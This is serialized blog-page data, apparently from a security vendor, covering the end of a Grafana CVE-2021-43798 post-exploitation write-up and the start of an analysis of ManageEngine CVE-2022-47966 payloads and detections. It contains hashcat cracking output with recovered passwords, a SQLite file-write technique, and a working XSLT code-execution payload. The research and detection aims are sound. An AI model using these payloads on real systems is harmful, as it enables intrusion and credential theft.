",[47,109026,109028],{"href":109027},"%E2%80%8B%E2%80%8Bhttps:\u002F\u002Fcommunity.grafana.com\u002Ft\u002Fminimum-password-requirements\u002F62819","doesn’t enforce"," any type of password complexity requirements. The sole requirement is that a password must be four characters or longer. The likelihood of a bad password is quite high. As a contrived example, we provide the hashes from our test Grafana server to Hashcat along with a standard password dictionary, and recover two passwords:",[1354,109031,109033],{"className":31740,"code":109032,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ hashcat -m 10900 10.9.49.222_3000_hashes.txt rockyou.txt -o cracked.out\nalbinolobster@mournland:~$ cat cracked.out\nsha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=:password\nsha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=:iloveyou\n",[886,109034,109035,109058,109066,109074],{"__ignoreMap":219},[1373,109036,109037,109039,109042,109044,109047,109050,109053,109055],{"class":1375,"line":1376},[1373,109038,55482],{"class":2206},[1373,109040,109041],{"class":1391}," hashcat",[1373,109043,84634],{"class":2209},[1373,109045,109046],{"class":5467}," 10900",[1373,109048,109049],{"class":1391}," 10.9.49.222_3000_hashes.txt",[1373,109051,109052],{"class":1391}," rockyou.txt",[1373,109054,39692],{"class":2209},[1373,109056,109057],{"class":1391}," cracked.out\n",[1373,109059,109060,109062,109064],{"class":1375,"line":220},[1373,109061,55482],{"class":2206},[1373,109063,70263],{"class":1391},[1373,109065,109057],{"class":1391},[1373,109067,109068,109071],{"class":1375,"line":1266},[1373,109069,109070],{"class":2206},"sha256:10000:YmhoVmdUbnM5bw",[1373,109072,109073],{"class":1391},"==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=:password\n",[1373,109075,109076,109079],{"class":1375,"line":1852},[1373,109077,109078],{"class":2206},"sha256:10000:TmNnZlRkendQYw",[1373,109080,109081],{"class":1391},"==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=:iloveyou\n",[18,109083,109084,109085,109087,109088,108511],{},"Exfiltrating the SQLite database, extracting password hashes, and cracking them seems to be a reasonable approach for gaining access into the Grafana Web UI. To me, this is obviously better than exfiltrating ",[886,109086,108004],{}," and likely better than focusing on the ",[886,109089,108452],{},[61,109091,109093],{"id":109092},"expanding-access","Expanding Access",[18,109095,109096,109097,59],{},"The obvious question now is, “What do Web UI credentials get me?” Surprisingly, even with an admin account, not much. We did solve one problem. The Grafana server should have access to all data source servers, so we should be able to proxy attacks (e.g. PostgreSQL command execution) through the Grafana server. But otherwise, a lot of administrative functionality is built into the Grafana CLI tool and excluded from the web interface (as we can see, rightly so). There is one useful feature an administrator has access to in the web UI: installing plugins from the ",[47,109098,109101],{"href":109099,"rel":109100},"https:\u002F\u002Fgrafana.com\u002Fgrafana\u002Fplugins\u002F",[51],"Grafana Catalog",[18,109103,109104],{},"One plugin that proves useful is the SQLite plugin.",[18,109106,109107],{},[68,109108],{":width":10862,"alt":108067,"src":109109},"\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fgrafana-sqlite-plugin.png",[18,109111,109112],{},"This blog is centered around exfiltrating Grafana’s SQLite database. Exfiltration with CVE-2021-43798 gave us read access to the database. The SQLite plugin gives us full write access to the Grafana database.",[18,109114,109115],{},[68,109116],{":width":10862,"alt":109117,"src":109118},"Grafana SQLite Data Source","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fsqlite-data-source.png",[18,109120,109121,109122,109125,109126,109130],{},"Being able to arbitrarily modify the Grafana database doesn’t lead to any obvious code execution opportunities (that we saw). But SQLite has a couple of interesting features that could potentially result in code execution. The first feature we looked at was ",[886,109123,109124],{},"load_extension",". This ",[47,109127,8560],{"href":109128,"rel":109129},"https:\u002F\u002Fwww.sqlite.org\u002Flang_corefunc.html#load_extension",[51]," could allow us to load and execute a shared object. However, the Grafana plugin has this feature disabled:",[18,109132,109133],{},[68,109134],{":width":10862,"alt":109135,"src":109136},"Grafana Load Extension Attempt","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fload-extension.png",[18,109138,109139,109140,109143,109144,109149,109150,4606],{},"The other potentially abusable SQLite feature is an arbitrary file write using ",[886,109141,109142],{},"attach database",". The ",[47,109145,109148],{"href":109146,"rel":109147},"https:\u002F\u002Fwww.sqlite.org\u002Flang_attach.html",[51],"created file"," will be an sqlite3 database, but others have achieved code execution with this method by targeting loose file formats (e.g. PHP). Grafana is largely Go-based (and has no association with PHP) but we can at least establish the arbitrary file write works. Below we attempt to make the file ",[886,109151,109152],{},"\u002Fvar\u002Flib\u002Fgrafana\u002Fplugins\u002Ffrser-sqlite-datasource\u002Fimg\u002Fvulncheck.html",[18,109154,109155],{},[68,109156],{":width":10862,"alt":109157,"src":109158},"Grafana File Write Query","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fsqlite-write-primitive.png",[18,109160,109161],{},"The write is successful. We know this because we can fetch the file over HTTP.",[18,109163,109164],{},[68,109165],{":width":10862,"alt":109166,"src":109167},"Grafana Write Success","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fwrite-success.png",[18,109169,109170,109171,109173,109174,109176,109177,109180],{},"The Grafana SQLite plugin gives us a write primitive on the server itself. However, assuming Grafana is running as the ",[886,109172,108091],{}," user, there aren't a lot of places an attacker can actually write to. ",[886,109175,108091],{}," is largely limited to the ",[886,109178,109179],{},"\u002Fvar\u002Flib\u002Fgrafana\u002Fplugins\u002F"," directory tree where all the Grafana plugins are stored. Plugins are a mix of Go, JavaScript, HTML, and CSS, so there is opportunity to modify plugins to further expand our reach on the system. Although, that’s an exercise we’ll leave for another time.",[18,109182,109183],{},"Of course, the attacker code just drop all tables and destroy the system. 🤷",[61,109185,1903],{"id":1902},[18,109187,109188],{},"In this blog, we looked at a file disclosure vulnerability affecting Grafana and examined how this issue might be used to gain additional access to the affected system. Exfiltrating the Grafana SQLite database allows attackers to extract password hashes, brute-force them, and, potentially, establish administrative access on the system. Administrative access gives the attacker write access to the underlying SQLite database via a plugin. In turn, the write access gives the attacker the ability to write files to the underlying filesystem (or destroy the database).",[18,109190,109191],{},"Brute forcing passwords can take a long time. A very long time. But once cracked, the attacker has that password forever. If your Grafana server was ever affected by this vulnerability, and exposed to the internet, it would be wise to rotate all passwords (data source passwords included).",[18,109193,109194,109195,109200],{},"VulnCheck tracks vulnerabilities and their exploits. We pride ourselves in knowing which vulnerabilities matter. For more information, ",[47,109196,109199],{"href":109197,"rel":109198},"https:\u002F\u002Fvulncheck.com\u002Fregister",[51],"register"," for a VulnCheck account today.",[2901,109202,109203],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":109205},[109206,109207,109208,109209,109210,109211],{"id":68326,"depth":220,"text":68327},{"id":107805,"depth":220,"text":107806},{"id":108078,"depth":220,"text":108079},{"id":108555,"depth":220,"text":108556},{"id":109092,"depth":220,"text":109093},{"id":1902,"depth":220,"text":1903},"2023-02-21","Examining previous exploits for Grafana's CVE-2021-43798 and looking for a path to establish initial access.",{"slug":109215},"grafana-cve-2021-43798","\u002Fblog\u002Fgrafana-cve-2021-43798",{"title":107764,"description":109213},"blog\u002Fgrafana-cve-2021-43798",[242,23275],"vqiTnFV6Fus7G52uwY8TzlEsnM2rvBqyrl49eFggWkY",{"id":109222,"title":83481,"articles":109223,"authors":109228,"body":109230,"date":111300,"description":111301,"extension":234,"image":7,"link":7,"meta":111302,"navigation":237,"path":111304,"seo":111305,"series":7,"stem":111306,"subtype":7,"tags":111307,"__hash__":111308},"blog\u002Fblog\u002Fcve-2022-47966-payload.md",[109224],{"title":109225,"source":3494,"link":109226,"date":109227},"Risky Biz News: EU cybersecurity agencies warn of Chinese APT spying","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-eu-cybersecurity-agencies","2023-02-16",[109229],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":109231,"toc":111295},[109232,109245,109285,109288,109292,109295,109634,109648,109651,109655,109676,109679,109685,109691,109699,109702,109708,109722,109731,109737,109755,109759,109762,110096,110102,110105,110490,110495,110926,110929,111247,111259,111262,111268,111278,111280,111286,111292],[18,109233,109234,109235,109239,109240,59],{},"One of the many things we do at VulnCheck is track public exploits. We’ve found very few security professionals develop their own original exploits. The exploits we end up tracking are often derivative works based on the first public exploit. This is in full display for ",[47,109236,61670],{"href":109237,"rel":109238},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-47966",[51],", an unauthenticated and remote vulnerability affecting a variety of ",[47,109241,109244],{"href":109242,"rel":109243},"https:\u002F\u002Fwww.manageengine.com\u002Fsecurity\u002Fadvisory\u002FCVE\u002Fcve-2022-47966.html",[51],"Zoho ManageEngine Products",[18,109246,109247,109248,109252,109253,109258,109259,1246,109263,109267,109268,109273,109274,982,109279,109284],{},"The first public exploit published for CVE-2022-47966 was developed by ",[47,109249,100798],{"href":109250,"rel":109251},"https:\u002F\u002Fraw.githubusercontent.com\u002Fhorizon3ai\u002FCVE-2022-47966\u002Fmain\u002FCVE-2022-47966.py",[51]," and published alongside a ",[47,109254,109257],{"href":109255,"rel":109256},"https:\u002F\u002Fwww.horizon3.ai\u002Fmanageengine-cve-2022-47966-technical-deep-dive\u002F",[51],"technical blog",". Following that release, we tracked a number of derivative exploits. Some are useful (e.g. ",[47,109260,22175],{"href":109261,"rel":109262},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fpull\u002F6564\u002Ffiles",[51],[47,109264,36852],{"href":109265,"rel":109266},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F17556",[51],"). Some add ",[47,109269,109272],{"href":109270,"rel":109271},"https:\u002F\u002Fgithub.com\u002FInplex-sys\u002FCVE-2022-47966\u002Ftree\u002Fe935a0577ef202f2763b96836fd10336ebc17eec",[51],"stylistic flair",". Some are almost entirely ",[47,109275,109278],{"href":109276,"rel":109277},"https:\u002F\u002Fraw.githubusercontent.com\u002Fp33d\u002FCVE-2022-47966\u002Fmain\u002F47966.py",[51],"copy",[47,109280,109283],{"href":109281,"rel":109282},"https:\u002F\u002Fraw.githubusercontent.com\u002Fnu11secur1ty\u002FCVE-mitre\u002Fcc803c2d49c065fd584ab6d0848373aeaba6b525\u002F2022\u002FCVE-2022-47966\u002FCVE-2022-47966.py",[51],"paste"," jobs. But no matter their differences, they all look, behave, and achieve execution like the original Horizon3.ai exploit.",[263,109286],{":list":109287,"ico":266,"title":83481},"[\"The first public exploit published for CVE-2022-47966 was developed by Horizon3.ai. Since then, VulnCheck has seen more than a dozen derivatives of the exploit that all look, behave, and achieve execution like the original.\",\"The problem with the lack of diversity in public offensive tooling is that it’s mirrored by a lack of diversity in defensive tooling.\",\"Today, there are a few freely available defensive tools that have published detections for CVE-2022-47966 from SigmaHQ, Rapid7 and Proofpoint. They all derive from, and are tailored to, the initial proof of concept developed by Horizon3.ai.\",\"However, these tools anticipate exploits that use an XSLT transform that ends in `getRuntime().exec()` in order to execute external programs.\",\"The reality is that an attacker with only a little knowledge can develop a new exploit that follows a completely different path and bypasses most open source detections currently available.\"]",[61,109289,109291],{"id":109290},"payload-similarities","Payload Similarities",[18,109293,109294],{},"Of the exploits mentioned above, all, except Metasploit, use the exact random values that Horizon3.ai embedded in their payload (not a requirement for exploitation). All send the exploit payload using an HTTP POST request. They all use the exact same XSLT transform to achieve arbitrary code execution:",[1354,109296,109298],{"className":27194,"code":109297,"language":27196,"meta":219,"style":219},"\u003Cds:Transforms>\n \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002F10\u002Fxml-exc-c14n#\"\u002F>\n \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n \u003Cxsl:stylesheet version=\"1.0\"\n xmlns:ob=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Object\"\n xmlns:rt=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Runtime\"\n xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n \u003Cxsl:template match=\"\u002F\">\n \u003Cxsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"\u002F>\n \u003Cxsl:variable name=\"process\" select=\"rt:exec($rtobject,'{command}')\"\u002F>\n \u003Cxsl:variable name=\"processString\" select=\"ob:toString($process)\"\u002F>\n \u003Cxsl:value-of select=\"$processString\"\u002F>\n \u003C\u002Fxsl:template>\n \u003C\u002Fxsl:stylesheet>\n \u003C\u002Fds:Transform>\n\u003C\u002Fds:Transforms>\n",[886,109299,109300,109314,109339,109362,109382,109401,109419,109438,109460,109495,109526,109558,109584,109597,109610,109622],{"__ignoreMap":219},[1373,109301,109302,109304,109307,109309,109312],{"class":1375,"line":1376},[1373,109303,11852],{"class":1397},[1373,109305,109306],{"class":4640},"ds",[1373,109308,4606],{"class":4636},[1373,109310,109311],{"class":4640},"Transforms",[1373,109313,6765],{"class":1397},[1373,109315,109316,109318,109320,109322,109325,109328,109330,109332,109335,109337],{"class":1375,"line":220},[1373,109317,8246],{"class":1397},[1373,109319,109306],{"class":4640},[1373,109321,4606],{"class":4636},[1373,109323,109324],{"class":27228},"Transform",[1373,109326,109327],{"class":4640}," Algorithm",[1373,109329,5417],{"class":1397},[1373,109331,183],{"class":1387},[1373,109333,109334],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F2001\u002F10\u002Fxml-exc-c14n#",[1373,109336,183],{"class":1387},[1373,109338,85355],{"class":1397},[1373,109340,109341,109343,109345,109347,109349,109351,109353,109355,109358,109360],{"class":1375,"line":1266},[1373,109342,8246],{"class":1397},[1373,109344,109306],{"class":4640},[1373,109346,4606],{"class":4636},[1373,109348,109324],{"class":27228},[1373,109350,109327],{"class":4640},[1373,109352,5417],{"class":1397},[1373,109354,183],{"class":1387},[1373,109356,109357],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116",[1373,109359,183],{"class":1387},[1373,109361,6765],{"class":1397},[1373,109363,109364,109366,109369,109371,109374,109376,109378,109380],{"class":1375,"line":1852},[1373,109365,85290],{"class":1397},[1373,109367,109368],{"class":4640},"xsl",[1373,109370,4606],{"class":4636},[1373,109372,109373],{"class":4640},"stylesheet version",[1373,109375,5417],{"class":1397},[1373,109377,183],{"class":1387},[1373,109379,84878],{"class":1391},[1373,109381,19057],{"class":1387},[1373,109383,109384,109387,109389,109392,109394,109396,109399],{"class":1375,"line":4692},[1373,109385,109386],{"class":4640}," xmlns",[1373,109388,4606],{"class":4636},[1373,109390,109391],{"class":4640},"ob",[1373,109393,5417],{"class":1397},[1373,109395,183],{"class":1387},[1373,109397,109398],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Object",[1373,109400,19057],{"class":1387},[1373,109402,109403,109405,109407,109410,109412,109414,109417],{"class":1375,"line":4724},[1373,109404,109386],{"class":4640},[1373,109406,4606],{"class":4636},[1373,109408,109409],{"class":4640},"rt",[1373,109411,5417],{"class":1397},[1373,109413,183],{"class":1387},[1373,109415,109416],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Runtime",[1373,109418,19057],{"class":1387},[1373,109420,109421,109423,109425,109427,109429,109431,109434,109436],{"class":1375,"line":4756},[1373,109422,109386],{"class":4640},[1373,109424,4606],{"class":4636},[1373,109426,109368],{"class":4640},[1373,109428,5417],{"class":1397},[1373,109430,183],{"class":1387},[1373,109432,109433],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform",[1373,109435,183],{"class":1387},[1373,109437,6765],{"class":1397},[1373,109439,109440,109443,109445,109447,109450,109452,109454,109456,109458],{"class":1375,"line":4768},[1373,109441,109442],{"class":1397}," \u003C",[1373,109444,109368],{"class":4640},[1373,109446,4606],{"class":4636},[1373,109448,109449],{"class":4640},"template match",[1373,109451,5417],{"class":1397},[1373,109453,183],{"class":1387},[1373,109455,2180],{"class":1391},[1373,109457,183],{"class":1387},[1373,109459,6765],{"class":1397},[1373,109461,109462,109465,109467,109469,109472,109474,109476,109479,109481,109484,109486,109488,109491,109493],{"class":1375,"line":4792},[1373,109463,109464],{"class":1397}," \u003C",[1373,109466,109368],{"class":4640},[1373,109468,4606],{"class":4636},[1373,109470,109471],{"class":4640},"variable name",[1373,109473,5417],{"class":1397},[1373,109475,183],{"class":1387},[1373,109477,109478],{"class":1391},"rtobject",[1373,109480,183],{"class":1387},[1373,109482,109483],{"class":4640}," select",[1373,109485,5417],{"class":1397},[1373,109487,183],{"class":1387},[1373,109489,109490],{"class":1391},"rt:getRuntime()",[1373,109492,183],{"class":1387},[1373,109494,85355],{"class":1397},[1373,109496,109497,109499,109501,109503,109505,109507,109509,109511,109513,109515,109517,109519,109522,109524],{"class":1375,"line":4798},[1373,109498,109464],{"class":1397},[1373,109500,109368],{"class":4640},[1373,109502,4606],{"class":4636},[1373,109504,109471],{"class":4640},[1373,109506,5417],{"class":1397},[1373,109508,183],{"class":1387},[1373,109510,18710],{"class":1391},[1373,109512,183],{"class":1387},[1373,109514,109483],{"class":4640},[1373,109516,5417],{"class":1397},[1373,109518,183],{"class":1387},[1373,109520,109521],{"class":1391},"rt:exec($rtobject,'{command}')",[1373,109523,183],{"class":1387},[1373,109525,85355],{"class":1397},[1373,109527,109528,109530,109532,109534,109536,109538,109540,109543,109545,109547,109549,109551,109554,109556],{"class":1375,"line":4806},[1373,109529,109464],{"class":1397},[1373,109531,109368],{"class":4640},[1373,109533,4606],{"class":4636},[1373,109535,109471],{"class":4640},[1373,109537,5417],{"class":1397},[1373,109539,183],{"class":1387},[1373,109541,109542],{"class":1391},"processString",[1373,109544,183],{"class":1387},[1373,109546,109483],{"class":4640},[1373,109548,5417],{"class":1397},[1373,109550,183],{"class":1387},[1373,109552,109553],{"class":1391},"ob:toString($process)",[1373,109555,183],{"class":1387},[1373,109557,85355],{"class":1397},[1373,109559,109560,109562,109564,109566,109568,109570,109573,109575,109577,109580,109582],{"class":1375,"line":4817},[1373,109561,109464],{"class":1397},[1373,109563,109368],{"class":4640},[1373,109565,4606],{"class":4636},[1373,109567,85021],{"class":4640},[1373,109569,61062],{"class":1397},[1373,109571,109572],{"class":4640},"of select",[1373,109574,5417],{"class":1397},[1373,109576,183],{"class":1387},[1373,109578,109579],{"class":1391},"$processString",[1373,109581,183],{"class":1387},[1373,109583,85355],{"class":1397},[1373,109585,109586,109589,109591,109593,109595],{"class":1375,"line":4825},[1373,109587,109588],{"class":1397}," \u003C\u002F",[1373,109590,109368],{"class":4640},[1373,109592,4606],{"class":4636},[1373,109594,30296],{"class":4640},[1373,109596,6765],{"class":1397},[1373,109598,109599,109602,109604,109606,109608],{"class":1375,"line":4835},[1373,109600,109601],{"class":1397}," \u003C\u002F",[1373,109603,109368],{"class":4640},[1373,109605,4606],{"class":4636},[1373,109607,49025],{"class":4640},[1373,109609,6765],{"class":1397},[1373,109611,109612,109614,109616,109618,109620],{"class":1375,"line":4843},[1373,109613,56557],{"class":1397},[1373,109615,109306],{"class":4640},[1373,109617,4606],{"class":4636},[1373,109619,109324],{"class":4640},[1373,109621,6765],{"class":1397},[1373,109623,109624,109626,109628,109630,109632],{"class":1375,"line":4849},[1373,109625,46627],{"class":1397},[1373,109627,109306],{"class":4640},[1373,109629,4606],{"class":4636},[1373,109631,109311],{"class":4640},[1373,109633,6765],{"class":1397},[18,109635,109636,109637,109640,109641,109644,109645,109647],{},"For those unfamiliar with XSLT transforms, the transform above invokes Java’s ",[886,109638,109639],{},"getRuntime().exec()"," with an attacker-provided string. For example, the attacker might provide the string ",[886,109642,109643],{},"cmd.exe \u002Fc whoami"," to execute the command ",[886,109646,22876],{},". That’s a fine solution for a proof of concept exploit, but a poor real world solution, as we will soon discuss.",[18,109649,109650],{},"Derivative exploits aren't necessarily a bad thing. For example, it’s great that Nuclei and Metasploit have CVE-2022-47966 implementations. Those tools will be widely used throughout the industry to detect, exploit, and eventually mitigate this vulnerability. The problem with the lack of diversity in public offensive tooling is that it’s mirrored by a lack of diversity in defensive tooling. Meaning, offensive security informs defensive security.",[61,109652,109654],{"id":109653},"detections-for-cve-2022-47966","Detections for CVE-2022-47966",[18,109656,109657,109658,109663,109664,109669,109670,109675],{},"There are a few freely available defensive tools that have published detections for CVE-2022-47966. There’s a ",[47,109659,109662],{"href":109660,"rel":109661},"https:\u002F\u002Fgithub.com\u002FSigmaHQ\u002Fsigma",[51],"Sigma"," rule, a ",[47,109665,109668],{"href":109666,"rel":109667},"https:\u002F\u002Fwww.rapid7.com\u002Fproducts\u002Fvelociraptor\u002F",[51],"Velociraptor"," log parser, and a couple of ",[47,109671,109674],{"href":109672,"rel":109673},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fproducts\u002Fadvanced-threat-protection\u002Fet-intelligence",[51],"Emerging Threats"," network signatures. All of these detections derive from, and are tailored to, the initial proof of concept developed by Horizon3.ai.",[18,109677,109678],{},"Consider these two Suricata rules published by Emerging Threats:",[1354,109680,109683],{"className":109681,"code":109682,"language":1359,"meta":219},[1357],"alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT ManageEngine Unauthenticated RCE Attempt M1 (CVE-2022-47966)\"; \\\nflow:to_server,established; \\\nhttp.method; content:\"POST\"; \\\nhttp.request_body; content:\"|27|SAMLResponse|27|\"; fast_pattern; \\\ncontent:\"|3a|\"; distance:0; within:5; \\\ncontent:\"|27|\"; base64_decode:offset 0, relative; \\\nbase64_data; content:\"|3a|getRuntime|28 29|\"; \\\ncontent:\"|3a|exec|28|\"; \\\nreference:cve,2022-47966; \\\nclasstype:attempted-admin; \\\nsid:2043335; rev:1; \\\nmetadata:attack_target Server, created_at 2023_01_19, cve CVE_2022_47966, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2023_01_19; )\n",[886,109684,109682],{"__ignoreMap":219},[1354,109686,109689],{"className":109687,"code":109688,"language":1359,"meta":219},[1357],"alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT ManageEngine Unauthenticated RCE Attempt M2 (CVE-2022-47966)\"; \\\nflow:to_server,established; \\\nhttp.method; content:\"POST\"; \\\nhttp.request_body; content:\"|22|SAMLResponse|22|\"; fast_pattern; \\\ncontent:\"|3a|\"; distance:0; within:5; \\\ncontent:\"|22|\"; \\\nbase64_decode:offset 0, relative; \\\nbase64_data; content:\"|3a|getRuntime|28 29|\"; \\\ncontent:\"|3a|exec|28|\"; \\\nreference:cve,2022-47966; \\\nclasstype:attempted-admin; \\\nsid:2043336; \\\nrev:1; \\\nmetadata:attack_target Server, created_at 2023_01_19, cve CVE_2022_47966, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2023_01_19;)\n",[886,109690,109688],{"__ignoreMap":219},[18,109692,109693,109694,982,109696,109698],{},"Ignoring the fact that these rules will never trigger on any exploit written for CVE-2022-47966, you can see that they were modeled after the Horizon3.ai exploit. The rules require an HTTP POST request and they look for ",[886,109695,27896],{},[886,109697,27901],{}," in the base64 encoded XML payload. Neither of these things are actually a requirement to exploit CVE-2022-47966.",[18,109700,109701],{},"Exploitation doesn’t require an HTTP POST. The PCAP screenshot below shows an exploit with the payload in an HTTP GET request resulting in a reverse shell.",[18,109703,109704],{},[68,109705],{":width":10862,"alt":109706,"src":109707},"GET Payload","\u002Fblog\u002Fcve-2022-47966-payload\u002Fget_reverse_shell.png",[18,109709,109710,109711,109713,109714,982,109716,109718,109719,109721],{},"Nor does CVE-2022-47966 need to use ",[886,109712,109639],{},". In fact, it’s probably best not to. As stated earlier, an XSLT transform can execute arbitrary Java. There isn’t any need to invoke external programs like ",[886,109715,14509],{},[886,109717,99000],{},". Java has most of what an attacker needs built-in. Additionally, ",[886,109720,82664],{}," invoking external programs is widely treated as potentially suspicious behavior and is likely to get an attacker caught.",[18,109723,109724,109725,109730],{},"For example, the ",[47,109726,109729],{"href":109727,"rel":109728},"https:\u002F\u002Fgithub.com\u002FSigmaHQ\u002Fsigma\u002Fblob\u002F6c153bff3f3b5bc7f0edefe430b2a6f903fd98b2\u002Frules\u002Fwindows\u002Fprocess_creation\u002Fproc_creation_win_susp_manageengine_pattern.yml",[51],"Sigma rule"," for CVE-2022-47966 is written to detect this exact activity:",[1354,109732,109735],{"className":109733,"code":109734,"language":1359,"meta":219},[1357],"logsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|contains|all:\n - 